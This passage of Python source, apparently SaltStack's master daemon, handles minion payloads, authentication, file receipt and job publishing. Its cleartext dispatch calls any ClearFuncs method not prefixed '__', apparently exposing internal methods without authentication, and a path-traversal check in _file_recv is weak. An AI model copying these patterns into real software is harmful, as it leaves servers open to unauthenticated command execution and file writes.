install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@tornado.gen.coroutine
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
:param dict payload: The payload route to the appropriate handler
'''
key = payload['enc']
load = payload['load']
ret = {'aes': self._handle_aes,
'clear': self._handle_clear}[key](load)
raise tornado.gen.Return(ret)
def _post_stats(self, stats):
'''
Fire events with stat info if it's time
'''
end_time = time.time()
if end_time - self.stat_clock > self.opts['master_stats_event_iter']:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event({'time': end_time - self.stat_clock, 'worker': self.name, 'stats': stats}, tagify(self.name, 'stats'))
self.stats = collections.defaultdict(lambda: {'mean': 0, 'latency': 0, 'runs': 0})
self.stat_clock = end_time
def _handle_clear(self, load):
'''
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
log.trace('Clear payload received with command %s', load['cmd'])
cmd = load['cmd']
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
ret = getattr(self.clear_funcs, cmd)(load), {'fun': 'send_clear'}
if self.opts['master_stats']:
stats = salt.utils.event.update_stats(self.stats, start, load)
self._post_stats(stats)
return ret
def _handle_aes(self, data):
'''
Process a command sent via an AES key
:param str load: Encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
if 'cmd' not in data:
log.error('Received malformed command %s', data)
return {}
cmd = data['cmd']
log.trace('AES payload received with command %s', data['cmd'])
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
def run_func(data):
return self.aes_funcs.run_func(data['cmd'], data)
with StackContext(functools.partial(RequestContext,
{'data': data,
'opts': self.opts})):
ret = run_func(data)
if self.opts['master_stats']:
stats = salt.utils.event.update_stats(self.stats, start, data)
self._post_stats(stats)
return ret
def run(self):
'''
Start a Master Worker
'''
salt.utils.process.appendproctitle(self.name)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts):
'''
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
'''
self.opts = opts
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.file_envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except (IOError, OSError):
log.warning(
'Salt minion claiming to be %s attempted to communicate with '
'master, but key could not be read and verification was denied.',
id_
)
return False
except (ValueError, IndexError, TypeError) as err:
log.error('Unable to load public key "%s": %s', pub_path, err)
try:
if salt.crypt.public_decrypt(pub, token) == b'salt':
return True
except ValueError as err:
log.error('Unable to decrypt token: %s', err)
log.error(
'Salt minion claiming to be %s has attempted to communicate with '
'the master and could not be verified', id_
)
return False
def verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorized a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
'Minion id %s is not who it says it is and is attempting '
'to issue a peer command', clear_load['id']
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
publish_validate=True)
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
:rtype: bool
:rtype: dict
:return: The original load (except for the token) if the load can be
verified. False if the load is invalid.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return False
if 'tok' in load:
load.pop('tok')
return load
def _master_tops(self, load):
'''
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
'''
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy']
mopts['env_order'] = self.opts['env_order']
mopts['default_top'] = self.opts['default_top']
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['state_top_saltenv'] = self.opts['state_top_saltenv']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['state_aggregate'] = self.opts['state_aggregate']
mopts['jinja_env'] = self.opts['jinja_env']
mopts['jinja_sls_env'] = self.opts['jinja_sls_env']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not isinstance(load['path'], list):
return False
if not self.opts['file_recv']:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > self.opts['file_recv_max_size'] * 0x100000:
log.error(
'file_recv_max_size limit of %d MB exceeded! %s will be '
'truncated. To successfully push this file, adjust '
'file_recv_max_size to an integer (in MB) large enough to '
'accommodate it.', self.opts['file_recv_max_size'], load['path']
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return {}
load.pop('tok')
# Join path
sep_path = os.sep.join(load['path'])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
# Ensure that this safety check is done after the path
# have been normalized.
if os.path.isabs(normpath) or '../' in load['path']:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
normpath)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts['cachedir']):
log.warning(
'Attempt to write received file outside of master cache '
'directory! Requested path: %s. Access denied.', cpath
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.files.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(salt.utils.stringutils.to_bytes(load['data']))
return True
def _pillar(self, load):
'''
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
pillar = salt.pillar.get_pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
ext=load.get('ext'),
pillar_override=load.get('pillar_override', {}),
pillarenv=load.get('pillarenv'),
extra_minion_data=load.get('extra_minion_data'))
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get('minion_data_cache', False):
self.masterapi.cache.store('minions/{0}'.format(load['id']),
'data',
{'grains': load['grains'],
'pillar': data})
if self.opts.get('minion_data_cache_events') is True:
self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion'))
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
'''
Act on specific events from minions
'''
id_ = load['id']
if load.get('tag', '') == '_salt_error':
log.error(
'Received minion error from [%s]: %s',
id_, load['data']['message']
)
for event in load.get('events', []):
event_data = event.get('data', {})
if 'minions' in event_data:
jid = event_data.get('jid')
if not jid:
continue
minions = event_data['minions']
try:
salt.utils.job.store_minions(
self.opts,
jid,
minions,
mminion=self.mminion,
syndic_id=id_)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
'Could not add minion(s) %s for job %s: %s',
minions, jid, exc
)
def _return(self, load):
'''
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
'''
if self.opts['require_minion_sign_messages'] and 'sig' not in load:
log.critical(
'_return: Master is requiring minions to sign their '
'messages, but there is no signature in this payload from '
'%s.', load['id']
)
return False
if 'sig' in load:
log.trace('Verifying signed event publish from minion')
sig = load.pop('sig')
this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id']))
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig):
log.info('Failed to verify event signature from minion %s.', load['id'])
if self.opts['drop_messages_signature_fail']:
log.critical(
'Drop_messages_signature_fail is enabled, dropping '
'message from %s', load['id']
)
return False
else:
log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.')
load['sig'] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion)
except salt.exceptions.SaltCacheError:
log.error('Could not store job information for load: %s', load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
'''
loads = load.get('load')
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
continue
# if we have a load, save it
if load.get('load'):
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load['load'])
# Register the syndic
syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id'])
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh:
wfh.write('')
# Format individual return loads
for key, item in six.iteritems(load['return']):
ret = {'jid': load['jid'],
'id': key}
ret.update(item)
if 'master_id' in load:
ret['master_id'] = load['master_id']
if 'fun' in load:
ret['fun'] = load['fun']
if 'arg' in load:
ret['fun_args'] = load['arg']
if 'out' in load:
ret['out'] = load['out']
if 'sig' in load:
ret['sig'] = load['sig']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
if the requesting minion also initialted the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, six.text_type(load['jid']))
with salt.utils.files.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion pay
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
.. code-block:: bash
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
:param dict load: The minion payload
:rtype: dict
:return: If the load is invalid, it may be returned. No key operation is performed.
:rtype: bool
:return: True if key was revoked, False if not
'''
load = self.__verify_load(load, ('id', 'tok'))
if not self.opts.get('allow_minion_key_revoke', False):
log.warning(
'Minion %s requested key revoke, but allow_minion_key_revoke '
'is set to False', load['id']
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
:param function func: The function to run
:return: The result of the master function that was called
'''
# Don't honor private functions
if func.startswith('__'):
# TODO: return some error? Seems odd to return {}
return {}, {'fun': 'send'}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call %s took %s seconds',
func, time.time() - start
)
except Exception:
ret = ''
log.error('Error in function %s:\n', func, exc_info=True)
else:
log.error(
'Received function %s which is unavailable on the master, '
'returning False', func
)
return False, {'fun': 'send'}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret, {'fun': 'send'}
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return ret, {'fun': 'send'}
return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']}
# Encrypt the return
return ret, {'fun': 'send'}
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
runner_check = self.ckminions.runner_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not runner_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(runner_check, dict) and 'error' in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.asynchronous(fun,
clear_load.get('kwarg', {}),
username)
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
return {'error': {'name': exc.__class__.__name__,
'args': exc.args,
'message': six.text_type(exc)}}
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
wheel_check = self.ckminions.wheel_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not wheel_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(wheel_check, dict) and 'error' in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': username}
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data['return'] = ret['return']
data['success'] = ret['success']
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
def mk_token(self, clear_load):
'''
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return token
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist'])
if publisher_acl.user_is_blacklisted(clear_load['user']) or \
publisher_acl.cmd_is_blacklisted(clear_load['fun']):
log.error(
'%s does not have permissions to run %s. Please contact '
'your local administrator if you believe this is in '
'error.\n', clear_load['user'], clear_load['fun']
)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Retrieve the minions list
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
delimiter
)
minions = _res.get('minions', list())
missing = _res.get('missing', list())
ssh_minions = _res.get('ssh_minions', False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == 'user':
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get('auth_list', [])
err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type)
if auth_check.get('error'):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthenticationError',
'message': 'Authentication error occurred.'}}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != 'user' or (auth_type == 'user' and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
minions=minions,
# always accept find_job
whitelist=['saltutil.find_job'],
)
if not authorized:
# Authorization error occurred. Do not continue.
if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra:
log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username'])
log.warning(err_msg)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Perform some specific auth_type tasks after the authorization check
if auth_type == 'token':
username = auth_check.get('username')
clear_load['user'] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == 'eauth':
# The username we are attempting to auth with
clear_load['user'] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions,
'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt'])
}
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {'enc': 'clear',
'load': {'error': 'Master failed to assign jid'}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions,
'missing': missing
}
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if 'token' in clear_load:
auth_type = 'token'
err_name = 'TokenAuthenticationError'
sensitive_load_keys = ['token']
elif 'eauth' in clear_load:
auth_type = 'eauth'
err_name = 'EauthAuthenticationError'
sensitive_load_keys = ['username', 'password']
else:
auth_type = 'user'
err_name = 'UserAuthenticationError'
key = self.key
return auth_type, err_name, key, sensitive_load_keys
def _prep_jid(self, clear_load, extra):
'''
Return a jid for this publication
'''
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load['jid'] if clear_load.get('jid') else None
nocache = extra.get('nocache', False)
# Retrieve the jid
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache,
passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
'Failed to allocate a jid. The requested returner \'{0}\' '
'could not be loaded.'.format(fstr.split('.')[0])
)
log.error(msg)
return {'error': msg}
return jid
def _send_pub(self, load):
'''
Take a load and send it across the network to connected minions
'''
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, '_ssh_client'):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
'''
Take a load and send it across the network to ssh minions
'''
if self.opts['enable_ssh_minions'] is True and ssh_minions is True:
log.debug('Send payload to ssh minions')
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
'''
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
'''
clear_load['jid'] = jid
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
'missing': missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr])
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if 'minions' not in arg_spec.args:
log.critical(
'The specified returner used for the external job cache '
'\'%s\' does not have a \'minions\' kwarg in the returner\'s '
'save_load function.', self.opts['ext_job_cache']
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
'The specified returner used for the external job cache '
'"%s" does not have a save_load function!',
self.opts['ext_job_cache']
)
if save_load_func:
try:
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"%s" does not have a save_load function!',
self.opts['master_job_cache']
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
